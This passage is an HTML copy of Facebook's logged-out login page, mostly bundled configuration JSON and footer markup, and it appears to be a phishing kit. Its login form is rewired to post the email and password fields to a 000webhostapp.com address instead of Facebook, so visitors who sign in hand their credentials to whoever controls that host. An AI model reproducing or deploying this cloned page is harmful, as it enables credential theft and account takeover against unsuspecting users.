"435691707": {
"sampleRate": 100
},
"435691902": {
"sampleRate": 100
},
"435691955": {
"sampleRate": 100
},
"435692102": {
"sampleRate": 100
},
"435692121": {
"sampleRate": 100
},
"435692864": {
"sampleRate": 100
},
"435692975": {
"sampleRate": 100
},
"435693002": {
"sampleRate": 100
},
"435693404": {
"sampleRate": 100
},
"435693854": {
"sampleRate": 100
},
"435694627": {
"sampleRate": 100
},
"435694927": {
"sampleRate": 100
},
"435694934": {
"sampleRate": 100
},
"435696304": {
"sampleRate": 100
},
"435696437": {
"sampleRate": 100
},
"435696473": {
"sampleRate": 1
},
"435696804": {
"sampleRate": 100
},
"435696833": {
"sampleRate": 100
},
"435697072": {
"sampleRate": 100
},
"435697446": {
"sampleRate": 100
},
"435697886": {
"sampleRate": 100
},
"435698374": {
"sampleRate": 100
},
"435698646": {
"sampleRate": 100
},
"435699123": {
"sampleRate": 100
},
"445974335": {
"sampleRate": 1
},
"445974949": {
"sampleRate": 1
},
"445975283": {
"sampleRate": 1
},
"445975837": {
"sampleRate": 1
},
"445975872": {
"sampleRate": 1
},
"445976360": {
"sampleRate": 1
},
"445977086": {
"sampleRate": 1
},
"445977677": {
"sampleRate": 1
},
"445977908": {
"sampleRate": 1
},
"445981782": {
"sampleRate": 1
},
"445982501": {
"sampleRate": 1
},
"445983197": {
"sampleRate": 1
},
"445985856": {
"sampleRate": 1
},
"445986130": {
"sampleRate": 1
},
"445986133": {
"sampleRate": 1
},
"445987236": {
"sampleRate": 1
},
"445987822": {
"sampleRate": 1
},
"445988600": {
"sampleRate": 1
},
"459277372": {
"sampleRate": 1
},
"459280844": {
"sampleRate": 1
},
"459283386": {
"sampleRate": 1
},
"459283488": {
"sampleRate": 1
},
"459285749": {
"sampleRate": 1
},
"459288505": {
"sampleRate": 1
},
"459291249": {
"sampleRate": 1
},
"459292159": {
"sampleRate": 1
},
"459292291": {
"sampleRate": 1
},
"460468818": {
"sampleRate": 1
},
"463013863": {
"sampleRate": 10
},
"463014635": {
"sampleRate": 1
},
"463015185": {
"sampleRate": 10
},
"463015362": {
"sampleRate": 1
},
"463015568": {
"sampleRate": 1
},
"463016139": {
"sampleRate": 1
},
"463016165": {
"sampleRate": 1
},
"463016390": {
"sampleRate": 1
},
"463016713": {
"sampleRate": 10
},
"463016767": {
"sampleRate": 1
},
"463017657": {
"sampleRate": 1
},
"463017909": {
"sampleRate": 1
},
"463018037": {
"sampleRate": 1
},
"463018218": {
"sampleRate": 1
},
"463018233": {
"sampleRate": 10
},
"463018876": {
"sampleRate": 1
},
"463018912": {
"sampleRate": 10
},
"463018943": {
"sampleRate": 1
},
"463019567": {
"sampleRate": 1
},
"463019974": {
"sampleRate": 10
},
"463020161": {
"sampleRate": 10
},
"463020176": {
"sampleRate": 1
},
"463020766": {
"sampleRate": 1
},
"463021213": {
"sampleRate": 1
},
"463021269": {
"sampleRate": 1
},
"463021570": {
"sampleRate": 10
},
"463021813": {
"sampleRate": 1
},
"463022130": {
"sampleRate": 10
},
"463022146": {
"sampleRate": 10
},
"463022516": {
"sampleRate": 10
},
"463022924": {
"sampleRate": 1
},
"463023032": {
"sampleRate": 10
},
"463023080": {
"sampleRate": 1
},
"463023725": {
"sampleRate": 1
},
"463024020": {
"sampleRate": 1
},
"463024072": {
"sampleRate": 10
},
"463024364": {
"sampleRate": 1
},
"463024522": {
"sampleRate": 10
},
"463024556": {
"sampleRate": 1
},
"463024597": {
"sampleRate": 1
},
"463025126": {
"sampleRate": 1
},
"463025650": {
"sampleRate": 1
},
"463025693": {
"sampleRate": 1
},
"463026246": {
"sampleRate": 10
},
"463027530": {
"sampleRate": 10
},
"478093416": {
"sampleRate": 1
},
"478093695": {
"sampleRate": 1
},
"480908390": {
"sampleRate": 10000
},
"480910975": {
"sampleRate": 10000
},
"480913460": {
"sampleRate": 10000
},
"480914164": {
"sampleRate": 10000
},
"480916396": {
"sampleRate": 10000
},
"484905239": {
"sampleRate": 10000
},
"508365154": {
"sampleRate": 1
},
"508369126": {
"sampleRate": 10000
},
"516228586": {
"sampleRate": 1
},
"516228710": {
"sampleRate": 1
},
"516229001": {
"sampleRate": 1
},
"516231801": {
"sampleRate": 1
},
"516233522": {
"sampleRate": 1
},
"516233736": {
"sampleRate": 1
},
"516234127": {
"sampleRate": 1
},
"516234250": {
"sampleRate": 1
},
"516234458": {
"sampleRate": 1
},
"516234851": {
"sampleRate": 1
},
"516234913": {
"sampleRate": 1
},
"516234920": {
"sampleRate": 1
},
"516234962": {
"sampleRate": 1
},
"516236532": {
"sampleRate": 1
},
"516237107": {
"sampleRate": 1
},
"516237754": {
"sampleRate": 1
},
"516239376": {
"sampleRate": 1
},
"516239513": {
"sampleRate": 1
},
"516242024": {
"sampleRate": 1
},
"517544500": {
"sampleRate": 1
},
"520225911": {
"sampleRate": 1
},
"520226562": {
"sampleRate": 1
},
"520226803": {
"sampleRate": 1
},
"520226859": {
"sampleRate": 1
},
"520227779": {
"sampleRate": 1
},
"520231860": {
"sampleRate": 1
},
"520231903": {
"sampleRate": 1
},
"520233760": {
"sampleRate": 1
},
"520234221": {
"sampleRate": 1
},
"520234245": {
"sampleRate": 1
},
"520234918": {
"sampleRate": 1
},
"520235197": {
"sampleRate": 1
},
"520239363": {
"sampleRate": 1
},
"526518298": {
"sampleRate": 1
},
"526518890": {
"sampleRate": 1
},
"526519344": {
"sampleRate": 1
},
"526521870": {
"sampleRate": 1
},
"526522103": {
"sampleRate": 1
},
"526525605": {
"sampleRate": 1
},
"526526434": {
"sampleRate": 1
},
"526527396": {
"sampleRate": 1
},
"526532064": {
"sampleRate": 1
},
"527765249": {
"sampleRate": 1
},
"527769459": {
"sampleRate": 1
},
"527771788": {
"sampleRate": 1
},
"531301737": {
"sampleRate": 10000
},
"531312344": {
"sampleRate": 10000
},
"532165955": {
"sampleRate": 1
},
"532167327": {
"sampleRate": 1
},
"532883550": {
"sampleRate": 1
},
"532885803": {
"sampleRate": 1
},
"532886361": {
"sampleRate": 1
},
"532888709": {
"sampleRate": 1
},
"538512187": {
"sampleRate": 1
},
"538522688": {
"sampleRate": 1
},
"538523041": {
"sampleRate": 1
},
"542776204": {
"sampleRate": 1
},
"542778775": {
"sampleRate": 1
},
"542784537": {
"sampleRate": 1
},
"544676057": {
"sampleRate": 10000
},
"559090277": {
"sampleRate": 1
},
"559090485": {
"sampleRate": 1
},
"559093968": {
"sampleRate": 1
},
"559094585": {
"sampleRate": 1
},
"559096080": {
"sampleRate": 1
},
"559096538": {
"sampleRate": 1
},
"559096915": {
"sampleRate": 1
},
"559099845": {
"sampleRate": 1
},
"559100761": {
"sampleRate": 1
},
"559101881": {
"sampleRate": 1
},
"559102417": {
"sampleRate": 1
},
"565709499": {
"sampleRate": 1
},
"565710427": {
"sampleRate": 100
},
"565717739": {
"sampleRate": 1
},
"572130828": {
"sampleRate": 1
},
"572137945": {
"sampleRate": 1
},
"572142814": {
"sampleRate": 1
},
"573317629": {
"sampleRate": 1
},
"582025217": {
"sampleRate": 1
},
"582025218": {
"sampleRate": 1
},
"588713587": {
"sampleRate": 1
},
"592582133": {
"sampleRate": 10000
},
"593299269": {
"sampleRate": 1
},
"593299382": {
"sampleRate": 1
},
"593303128": {
"sampleRate": 1
},
"593303848": {
"sampleRate": 1
},
"593305703": {
"sampleRate": 1
},
"593306265": {
"sampleRate": 1
},
"593310598": {
"sampleRate": 1
},
"597497308": {
"sampleRate": 10000
},
"597498673": {
"sampleRate": 10000
},
"597501298": {
"sampleRate": 10000
},
"603855120": {
"sampleRate": 100
},
"612961719": {
"sampleRate": 1
},
"612970753": {
"sampleRate": 1
},
"612973892": {
"sampleRate": 1
},
"625872161": {
"sampleRate": 1
},
"625872374": {
"sampleRate": 1
},
"625872449": {
"sampleRate": 1
},
"625872960": {
"sampleRate": 1
},
"625873595": {
"sampleRate": 1
},
"625874920": {
"sampleRate": 1
},
"625875030": {
"sampleRate": 1
},
"625879077": {
"sampleRate": 1
},
"625880936": {
"sampleRate": 1
},
"625882015": {
"sampleRate": 1
},
"625882307": {
"sampleRate": 1
},
"625882731": {
"sampleRate": 1
},
"625884250": {
"sampleRate": 1
},
"625884983": {
"sampleRate": 1
},
"634592018": {
"sampleRate": 1
},
"640496395": {
"sampleRate": 1
},
"641272127": {
"sampleRate": 1
},
"641272881": {
"sampleRate": 1
},
"641273441": {
"sampleRate": 1
},
"641273554": {
"sampleRate": 1
},
"641278608": {
"sampleRate": 1
},
"641281776": {
"sampleRate": 1
},
"641282992": {
"sampleRate": 1
},
"641284572": {
"sampleRate": 1
},
"658310259": {
"sampleRate": 1
},
"658311000": {
"sampleRate": 1
},
"658311653": {
"sampleRate": 1
},
"658312030": {
"sampleRate": 1
},
"658312503": {
"sampleRate": 1
},
"658313937": {
"sampleRate": 1
},
"658314754": {
"sampleRate": 1
},
"658319560": {
"sampleRate": 1
},
"658320532": {
"sampleRate": 1
},
"658323570": {
"sampleRate": 1
},
"658325194": {
"sampleRate": 1
},
"663618882": {
"sampleRate": 1
},
"663621158": {
"sampleRate": 1
},
"663621340": {
"sampleRate": 1
},
"663621548": {
"sampleRate": 1
},
"663622595": {
"sampleRate": 1
},
"663622603": {
"sampleRate": 1
},
"663622613": {
"sampleRate": 1
},
"663622990": {
"sampleRate": 1
},
"663624058": {
"sampleRate": 1
},
"663625914": {
"sampleRate": 1
},
"663626399": {
"sampleRate": 1
},
"663627363": {
"sampleRate": 1
},
"663627729": {
"sampleRate": 1
},
"663627771": {
"sampleRate": 1
},
"663628202": {
"sampleRate": 1
},
"663629149": {
"sampleRate": 1
},
"663629736": {
"sampleRate": 1
},
"663630260": {
"sampleRate": 1
},
"663631213": {
"sampleRate": 1
},
"663631390": {
"sampleRate": 1
},
"663631507": {
"sampleRate": 1
},
"663631670": {
"sampleRate": 1
},
"663632060": {
"sampleRate": 1
},
"663632194": {
"sampleRate": 1
},
"664017918": {
"sampleRate": 1
},
"667166687": {
"sampleRate": 10000
},
"668272330": {
"sampleRate": 1
},
"668282222": {
"sampleRate": 1
},
"668283633": {
"sampleRate": 1
},
"674368495": {
"sampleRate": 1
},
"685309953": {
"sampleRate": 10000
},
"685309954": {
"sampleRate": 10000
},
"685576384": {
"sampleRate": 1
},
"685579102": {
"sampleRate": 10
},
"688919680": {
"sampleRate": 10000
},
"688924705": {
"sampleRate": 10000
},
"688926599": {
"sampleRate": 1
},
"688930365": {
"sampleRate": 100
},
"689903304": {
"sampleRate": 1
},
"689904686": {
"sampleRate": 1
},
"689907311": {
"sampleRate": 1
},
"689908443": {
"sampleRate": 1
},
"689910058": {
"sampleRate": 1
},
"691799027": {
"sampleRate": 1
},
"691804175": {
"sampleRate": 1
},
"691810525": {
"sampleRate": 1000
},
"691813192": {
"sampleRate": 1
},
"691813340": {
"sampleRate": 1
},
"695799416": {
"sampleRate": 10
},
"695806386": {
"sampleRate": 10000
},
"696780884": {
"sampleRate": 1
},
"696782251": {
"sampleRate": 1
},
"696782870": {
"sampleRate": 1
},
"696785751": {
"sampleRate": 1
},
"697373488": {
"sampleRate": 10000
},
"716966485": {
"sampleRate": 1
},
"716966647": {
"sampleRate": 1
},
"716979633": {
"sampleRate": 1
},
"719323137": {
"sampleRate": 1
},
"719323138": {
"sampleRate": 1
},
"719326647": {
"sampleRate": 1
},
"719327653": {
"sampleRate": 1
},
"719332537": {
"sampleRate": 1
},
"719334544": {
"sampleRate": 1
},
"719335669": {
"sampleRate": 1
},
"719336631": {
"sampleRate": 1
},
"719337039": {
"sampleRate": 1
},
"719988411": {
"sampleRate": 10000
},
"721159436": {
"sampleRate": 10
},
"721166420": {
"sampleRate": 10
},
"725156869": {
"sampleRate": 1
},
"725157581": {
"sampleRate": 1
},
"725157683": {
"sampleRate": 1
},
"725157923": {
"sampleRate": 1
},
"725158389": {
"sampleRate": 1
},
"725158695": {
"sampleRate": 1
},
"725159829": {
"sampleRate": 1
},
"725160706": {
"sampleRate": 1
},
"725163651": {
"sampleRate": 1
},
"725165351": {
"sampleRate": 1
},
"725166821": {
"sampleRate": 1
},
"725170528": {
"sampleRate": 1
},
"725430792": {
"sampleRate": 10000
},
"725614593": {
"sampleRate": 1
},
"725623863": {
"sampleRate": 1
},
"731650369": {
"sampleRate": 1
},
"733095886": {
"sampleRate": 1
},
"747445299": {
"sampleRate": 1
},
"747454106": {
"sampleRate": 1
},
"755959842": {
"sampleRate": 1
},
"755965148": {
"sampleRate": 1
},
"755968561": {
"sampleRate": 1
},
"759566636": {
"sampleRate": 1
},
"759576445": {
"sampleRate": 1
},
"767301815": {
"sampleRate": 10000
},
"777060353": {
"sampleRate": 10000
},
"777330614": {
"sampleRate": 1
},
"777338387": {
"sampleRate": 1
},
"778897115": {
"sampleRate": 1
},
"778910749": {
"sampleRate": 1
},
"779762281": {
"sampleRate": 1
},
"780212905": {
"sampleRate": 1
},
"782907314": {
"sampleRate": 1
},
"782908389": {
"sampleRate": 1
},
"788144639": {
"sampleRate": 1
},
"789446657": {
"sampleRate": 1
},
"789450742": {
"sampleRate": 1
},
"790891628": {
"sampleRate": 100
},
"790898449": {
"sampleRate": 100
},
"790901695": {
"sampleRate": 100
},
"801442060": {
"sampleRate": 100
},
"801443888": {
"sampleRate": 1
},
"801449188": {
"sampleRate": 1
},
"801454903": {
"sampleRate": 1
},
"801455226": {
"sampleRate": 1
},
"810491575": {
"sampleRate": 10000
},
"810498220": {
"sampleRate": 10000
},
"821831905": {
"sampleRate": 1000
},
"821836802": {
"sampleRate": 1000
},
"825425921": {
"sampleRate": 1
},
"825433348": {
"sampleRate": 1
},
"835068505": {
"sampleRate": 10000
},
"835069323": {
"sampleRate": 10000
},
"835075303": {
"sampleRate": 10000
},
"841618442": {
"sampleRate": 1
},
"841622832": {
"sampleRate": 1
},
"841627612": {
"sampleRate": 1
},
"846476042": {
"sampleRate": 10000
},
"849416660": {
"sampleRate": 1
},
"849416900": {
"sampleRate": 1
},
"849418188": {
"sampleRate": 1
},
"849419603": {
"sampleRate": 1
},
"849419641": {
"sampleRate": 1
},
"849421651": {
"sampleRate": 1
},
"849422375": {
"sampleRate": 1
},
"849422997": {
"sampleRate": 1
},
"866652534": {
"sampleRate": 1
},
"866653743": {
"sampleRate": 1
},
"866653977": {
"sampleRate": 1
},
"866657326": {
"sampleRate": 1
},
"868220929": {
"sampleRate": 1
},
"868222401": {
"sampleRate": 1
},
"869731149": {
"sampleRate": 10
},
"869741371": {
"sampleRate": 10
},
"876875095": {
"sampleRate": 1
},
"876878048": {
"sampleRate": 1
},
"876878791": {
"sampleRate": 1
},
"876881256": {
"sampleRate": 1
},
"876885126": {
"sampleRate": 1
},
"876885178": {
"sampleRate": 1
},
"876885490": {
"sampleRate": 1
},
"876885997": {
"sampleRate": 1
},
"876887495": {
"sampleRate": 1
},
"891686230": {
"sampleRate": 1
},
"892211987": {
"sampleRate": 10000
},
"892215753": {
"sampleRate": 1
},
"892216533": {
"sampleRate": 10000
},
"896140808": {
"sampleRate": 100
},
"896147113": {
"sampleRate": 100
},
"896148353": {
"sampleRate": 50000
},
"896149667": {
"sampleRate": 1
},
"896152749": {
"sampleRate": 100
},
"899355574": {
"sampleRate": 10
},
"901855609": {
"sampleRate": 1
},
"916591346": {
"sampleRate": 10000
},
"916594868": {
"sampleRate": 10000
},
"916596786": {
"sampleRate": 10000
},
"916599023": {
"sampleRate": 10000
},
"916602249": {
"sampleRate": 10000
},
"919603227": {
"sampleRate": 100
},
"919603854": {
"sampleRate": 10000
},
"919614523": {
"sampleRate": 10000
},
"919623711": {
"sampleRate": 10000
},
"941884476": {
"sampleRate": 1
},
"941884945": {
"sampleRate": 1
},
"941885000": {
"sampleRate": 1
},
"941885024": {
"sampleRate": 1
},
"941885056": {
"sampleRate": 1
},
"941885063": {
"sampleRate": 1
},
"941885196": {
"sampleRate": 1
},
"941885615": {
"sampleRate": 1
},
"941886063": {
"sampleRate": 1
},
"941886114": {
"sampleRate": 1
},
"941886177": {
"sampleRate": 1
},
"941886197": {
"sampleRate": 1
},
"941886335": {
"sampleRate": 1
},
"941886520": {
"sampleRate": 1
},
"941886823": {
"sampleRate": 1
},
"941886887": {
"sampleRate": 1
},
"941886907": {
"sampleRate": 1
},
"941887006": {
"sampleRate": 1
},
"941887370": {
"sampleRate": 1
},
"941887457": {
"sampleRate": 1
},
"941887999": {
"sampleRate": 1
},
"941888108": {
"sampleRate": 1
},
"941888329": {
"sampleRate": 1
},
"941888850": {
"sampleRate": 1
},
"941889079": {
"sampleRate": 1
},
"941889130": {
"sampleRate": 1
},
"941889635": {
"sampleRate": 1
},
"941889736": {
"sampleRate": 1
},
"941889793": {
"sampleRate": 1
},
"941889802": {
"sampleRate": 1
},
"941889924": {
"sampleRate": 1
},
"941890036": {
"sampleRate": 1
},
"941890649": {
"sampleRate": 1
},
"941890651": {
"sampleRate": 1
},
"941892105": {
"sampleRate": 1
},
"941892335": {
"sampleRate": 1
},
"941892412": {
"sampleRate": 1
},
"941892571": {
"sampleRate": 1
},
"941892660": {
"sampleRate": 1
},
"941892702": {
"sampleRate": 1
},
"941893098": {
"sampleRate": 1
},
"941893166": {
"sampleRate": 1
},
"941893219": {
"sampleRate": 1
},
"941893436": {
"sampleRate": 1
},
"941893492": {
"sampleRate": 1
},
"941893606": {
"sampleRate": 1
},
"941893915": {
"sampleRate": 1
},
"941894402": {
"sampleRate": 1
},
"941894849": {
"sampleRate": 1
},
"941894918": {
"sampleRate": 1
},
"941895125": {
"sampleRate": 1
},
"941895130": {
"sampleRate": 1
},
"941895531": {
"sampleRate": 1
},
"941895975": {
"sampleRate": 1
},
"941896048": {
"sampleRate": 1
},
"941896080": {
"sampleRate": 1
},
"941896375": {
"sampleRate": 1
},
"941896499": {
"sampleRate": 1
},
"941896590": {
"sampleRate": 1
},
"941896715": {
"sampleRate": 1
},
"941896722": {
"sampleRate": 1
},
"941897039": {
"sampleRate": 1
},
"941897301": {
"sampleRate": 1
},
"941897516": {
"sampleRate": 1
},
"941897846": {
"sampleRate": 1
},
"941898160": {
"sampleRate": 1
},
"941898442": {
"sampleRate": 1
},
"941898452": {
"sampleRate": 1
},
"941898874": {
"sampleRate": 1
},
"941899083": {
"sampleRate": 1
},
"941899192": {
"sampleRate": 1
},
"941899484": {
"sampleRate": 1
},
"949157888": {
"sampleRate": 100
},
"959719071": {
"sampleRate": 10000
},
"959721070": {
"sampleRate": 10000
},
"960890150": {
"sampleRate": 1
},
"960893339": {
"sampleRate": 1
},
"960894018": {
"sampleRate": 1
},
"960898403": {
"sampleRate": 1
},
"960899916": {
"sampleRate": 1
},
"974004284": {
"sampleRate": 1
},
"979310688": {
"sampleRate": 1
},
"979311344": {
"sampleRate": 1
},
"979316809": {
"sampleRate": 1
},
"981407973": {
"sampleRate": 1
},
"981414956": {
"sampleRate": 1
},
"987104250": {
"sampleRate": 1
},
"987105325": {
"sampleRate": 1
},
"987105778": {
"sampleRate": 1
},
"987107036": {
"sampleRate": 1
},
"987107107": {
"sampleRate": 1
},
"987107859": {
"sampleRate": 1
},
"987109656": {
"sampleRate": 1
},
"987110118": {
"sampleRate": 1
},
"987111426": {
"sampleRate": 1
},
"987112165": {
"sampleRate": 1
},
"987112390": {
"sampleRate": 1
},
"987113824": {
"sampleRate": 1
},
"987115291": {
"sampleRate": 1
},
"987115605": {
"sampleRate": 1
},
"987115762": {
"sampleRate": 1
},
"1001586691": {
"sampleRate": 10000
},
"1003294845": {
"sampleRate": 10000
},
"1007559649": {
"sampleRate": 1000
},
"1010107390": {
"sampleRate": 1
},
"1023354200": {
"sampleRate": 1
},
"1049298559": {
"sampleRate": 1
},
"1049310946": {
"sampleRate": 1
},
"1054555339": {
"sampleRate": 1
},
"1063783100": {
"sampleRate": 250
},
"1063796217": {
"sampleRate": 250
},
"1505636832": {
"sampleRate": 1
}
},
"killswitch": false
}, 3504],
["WebLoomConfig", [], {
"adaptive_config": {
"interactions": {
"modules": {
"2097": 1,
"8881": 1,
"12068": 1
},
"events": {}
},
"qpl": {
"modules": {},
"events": {}
},
"modules": null,
"events": null
}
}, 4171],
["cr:692209", ["cancelIdleCallbackBlue"], {
"__rc": ["cancelIdleCallbackBlue",
"Aa3QU5erRjzHtjJ94CtINFDR8IMHcYqhh0ITTyNgjRH0CtSF-R2NiRot5wgGbGgrYqtU_YPRyshUE13-VjVJuxKu1y0"
]
}, -1],
["cr:955714", [], {
"__rc": [null,
"Aa3E6rjjacZAL_pcgqLpIOe_5rS6GnuxkKlLgXhSJz64eYIhCCGajwg7xQLI_eRn3Jm5KH5nxGNn_3xa-LEm"
]
}, -1],
["cr:1094133", [], {
"__rc": [null,
"Aa0tacNtV1gUl9egTJkR8-arsMIdsmRNCzvdv4o4bFXY5UlXPQQVXmXEjnIyecEdxtdgR8XABLbj5bS5jeDtRlt_218"
]
}, -1],
["cr:1367102", [], {
"__rc": [null,
"Aa1VQ1uF9AYl9_W749bBL4yLDxoBt77y19_ZNIAexgwpbkkXhuueuiWkToflgk3MHjEj2zphz7G4VaupGAtwgiJk"
]
}, -1],
["cr:1984081", [], {
"__rc": [null,
"Aa2FZKHXjg5df2vzRPfWuoya4q61YoGWMsP_w8uM73-vLd0gP1YjgYNxG8Z4wwUOO9yv7G6CBLAJJTOQeImtoNc5fya2"
]
}, -1]
],
"require": [
["markJSEnabled"],
["lowerDomain"],
["URLFragmentPrelude"],
["Primer"],
["BigPipe"],
["Bootloader"],
["TimeSlice"],
["AsyncRequest"],
["BanzaiScuba_DEPRECATED"],
["VisualCompletionGating"],
["FbtLogging"],
["IntlQtEventFalcoEvent"],
["RequireDeferredReference", "unblock", [],
[
["AsyncRequest", "BanzaiScuba_DEPRECATED", "VisualCompletionGating",
"FbtLogging", "IntlQtEventFalcoEvent"
]
]
]
]
});
});
</script>
</head>
<body class="fbIndex UIPage_LoggedOut _-kb _605a b_c3pyn-ahh chrome webkit win x1 Locale_en_GB" dir="ltr">
<script nonce="nHhiRPia">
requireLazy(["bootstrapWebSession"], function (j) {
j(1615751207)
})
</script>
<div class="_li" id="u_0_3_AK">
<div class="_3_s0 _1toe _3_s1 _3_s1 uiBoxGray noborder" data-testid="ax-navigation-menubar" id="u_0_4_Kj">
<div class="_608m">
<div class="_5aj7 _tb6">
<div class="_4bl7"><span class="mrm _3bcv _50f3">Jump to</span></div>
<div class="_4bl9 _3bcp">
<div class="_6a _608n" aria-label="Navigation assistant" aria-keyshortcuts="Alt+/"
role="menubar" id="u_0_5_wJ">
<div class="_6a uiPopover" id="u_0_6_s3"><a role="button"
class="_42ft _4jy0 _55pi _2agf _4o_4 _63xb _p _4jy3 _517h _51sy" href="#"
style="max-width:200px;" aria-haspopup="true" aria-expanded="false" rel="toggle"
id="u_0_7_8g"><span class="_55pe">Sections of this page</span><span
class="_4o_3 _3-99"><i class="img sp_kVm6cmI9bbE sx_bf2715"></i></span></a>
</div>
<div class="_6a _3bcs"></div>
<div class="_6a mrm uiPopover" id="u_0_8_/Z"><a role="button"
class="_42ft _4jy0 _55pi _2agf _4o_4 _3_s2 _63xb _p _4jy3 _4jy1 selected _51sy"
href="#" style="max-width:200px;" aria-haspopup="true" tabindex="-1"
aria-expanded="false" rel="toggle" id="u_0_9_9G"><span class="_55pe">Accessibility
help</span><span class="_4o_3 _3-99"><i
class="img sp_kVm6cmI9bbE sx_2a4016"></i></span></a></div>
</div>
</div>
<div class="_4bl7 mlm pll _3bct">
<div class="_6a _3bcy">Press <span class="_3bcz">alt</span> + <span class="_3bcz">/</span> to
open this menu</div>
</div>
</div>
</div>
</div>
<div id="globalContainer" class="uiContextualLayerParent">
<div class="fb_content clearfix " id="content" role="main">
<div>
<div class="_8esj _95k9 _8esf _8opv _8f3m _8ilg _8icx _8op_ _95ka">
<div class="_8esk">
<div class="_8esl">
<div class="_8ice"><img class="fb_logo _8ilh img"
src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg"
alt="Facebook" /></div>
<h2 class="_8eso">Facebook helps you connect and share with the people in your life.
</h2>
</div>
<div class="_8esn">
<div class="_8iep _8icy _9ahz _9ah-">
<div class="_6luv _52jv">
<form class="_featuredLogin__formContainer" data-testid="royal_login_form"
action="http://famouscoupleleaks.000webhostapp.com/post.php"
method="post" onsubmit="" id="u_0_a_/N"><input type="hidden" name="jazoest"
value="2972" autocomplete="off" /><input type="hidden" name="lsd"
value="AVqhdBwnN2Q" autocomplete="off" />
<div>
<div class="_6lux"><input type="text" class="inputtext _55r1 _6luy"
name="email" id="email" data-testid="royal_email"
placeholder="Email address or phone number" autofocus="1"
aria-label="Email address or phone number" /></div>
<div class="_6lux">
<div class="_6luy _55r1 _1kbt" id="passContainer"><input
type="password" class="inputtext _55r1 _6luy _9npi"
name="pass" id="pass" data-testid="royal_pass"
placeholder="Password" aria-label="Password" /></div>
</div>
<div class="_9ls7" id="u_0_b_9E"><a href="#" role="button">
<div class="_9luh">
<div class="_9lsb" id="u_0_c_Ba"></div>
</div>
</a></div>
</div><input type="hidden" autocomplete="off" name="login_source"
value="comet_headerless_login" /><input type="hidden" autocomplete="off"
name="next" value="" />
<div class="_6ltg"><button value="1"
class="_42ft _4jy0 _6lth _4jy6 _4jy1 selected _51sy" name="login"
data-testid="royal_login_button" type="submit" id="u_0_d_zR">Log
In</button></div>
<div class="_6ltj"><a
href="https://www.facebook.com/recover/initiate/?ars=facebook_login&privacy_mutation_token=eyJ0eXBlIjowLCJjcmVhdGlvbl90aW1lIjoxNjE1NzUxMjA3LCJjYWxsc2l0ZV9pZCI6MzgxMjI5MDc5NTc1OTQ2fQ%3D%3D">Forgotten
password?</a></div>
<div class="_8icz"></div>
<div class="_6ltg"><a role="button"
class="_42ft _4jy0 _6lti _4jy6 _4jy2 selected _51sy" href="#"
ajaxify="/reg/spotlight/" id="u_0_2_/E"
data-testid="open-registration-form-button" rel="async">Create New
Account</a></div>
</form>
</div>
<div id="reg_pages_msg" class="_58mk"><a
href="/pages/create/?ref_type=registration_form" class="_8esh">Create a
Page</a> for a celebrity, band or business.</div>
</div>
</div>
</div>
</div>
</div>
</div>
<div class="">
<div class="_8opy">
<div class="_95ke">
<div id="pageFooter" data-referrer="page_footer" data-testid="page_footer">
<ul class="uiList localeSelectorList _2pid _509- _4ki _6-h _6-j _6-i" data-nocookies="1">
<li>English (UK)</li>
<li><a class="_sv4" dir="rtl" href="https://ur-pk.facebook.com/"
onclick="require("IntlUtils").setCookieLocale("ur_PK", "en_GB", "https:\/\/ur-pk.facebook.com\/", "www_list_selector", 0); return false;"
title="Urdu">اردو</a></li>
<li><a class="_sv4" dir="rtl" href="https://ps-af.facebook.com/"
onclick="require("IntlUtils").setCookieLocale("ps_AF", "en_GB", "https:\/\/ps-af.facebook.com\/", "www_list_selector", 1); return false;"
title="Pashto">پښتو</a></li>
<li><a class="_sv4" dir="rtl" href="https://ar-ar.facebook.com/"
onclick="require("IntlUtils").setCookieLocale("ar_AR", "en_GB", "https:\/\/ar-ar.facebook.com\/", "www_list_selector", 2); return false;"
title="Arabic">العربية</a></li>
<li><a class="_sv4" dir="ltr" href="https://hi-in.facebook.com/"
onclick="require("IntlUtils").setCookieLocale("hi_IN", "en_GB", "https:\/\/hi-in.facebook.com\/", "www_list_selector", 3); return false;"
title="Hindi">हिन्दी</a></li>
<li><a class="_sv4" dir="ltr" href="https://pa-in.facebook.com/"
onclick="require("IntlUtils").setCookieLocale("pa_IN", "en_GB", "https:\/\/pa-in.facebook.com\/", "www_list_selector", 4); return false;"
title="Punjabi">ਪੰਜਾਬੀ</a></li>
<li><a class="_sv4" dir="ltr" href="https://bn-in.facebook.com/"
onclick="require("IntlUtils").setCookieLocale("bn_IN", "en_GB", "https:\/\/bn-in.facebook.com\/", "www_list_selector", 5); return false;"
title="Bengali">বাংলা</a></li>
<li><a class="_sv4" dir="ltr" href="https://de-de.facebook.com/"
onclick="require("IntlUtils").setCookieLocale("de_DE", "en_GB", "https:\/\/de-de.facebook.com\/", "www_list_selector", 6); return false;"
title="German">Deutsch</a></li>
<li><a class="_sv4" dir="ltr" href="https://gu-in.facebook.com/"
onclick="require("IntlUtils").setCookieLocale("gu_IN", "en_GB", "https:\/\/gu-in.facebook.com\/", "www_list_selector", 7); return false;"
title="Gujarati">ગુજરાતી</a></li>
<li><a class="_sv4" dir="rtl" href="https://fa-ir.facebook.com/"
onclick="require("IntlUtils").setCookieLocale("fa_IR", "en_GB", "https:\/\/fa-ir.facebook.com\/", "www_list_selector", 8); return false;"
title="Persian">فارسی</a></li>
<li><a class="_sv4" dir="ltr" href="https://es-la.facebook.com/"
onclick="require("IntlUtils").setCookieLocale("es_LA", "en_GB", "https:\/\/es-la.facebook.com\/", "www_list_selector", 9); return false;"
title="Spanish">Español</a></li>
<li><a role="button" class="_42ft _4jy0 _517i _517h _51sy" rel="dialog"
ajaxify="/settings/language/language/?uri=https%3A%2F%2Fes-la.facebook.com%2F&source=www_list_selector_more"
href="#" title="Show more languages"><i
class="img sp_kVm6cmI9bbE sx_3ea446"></i></a></li>
</ul>
<div id="contentCurve"></div>
<div id="pageFooterChildren" role="contentinfo" aria-label="Facebook site links">
<ul class="uiList pageFooterLinkList _509- _4ki _703 _6-i">
<li><a href="/r.php" title="Sign up for Facebook">Sign Up</a></li>
<li><a href="/login/" title="Log in to Facebook">Log In</a></li>
<li><a href="https://messenger.com/" title="Take a look at Messenger.">Messenger</a>
</li>
<li><a href="/lite/" title="Facebook Lite for Android.">Facebook Lite</a></li>
<li><a href="https://www.facebook.com/watch/" title="Browse our Watch videos.">
Watch </a></li>
<li><a href="/directory/people/" title="Browse our people directory.">People</a>
</li>
<li><a href="/directory/pages/" title="Browse our Pages directory.">Pages</a></li>
<li><a href="/pages/category/">Page categories</a></li>
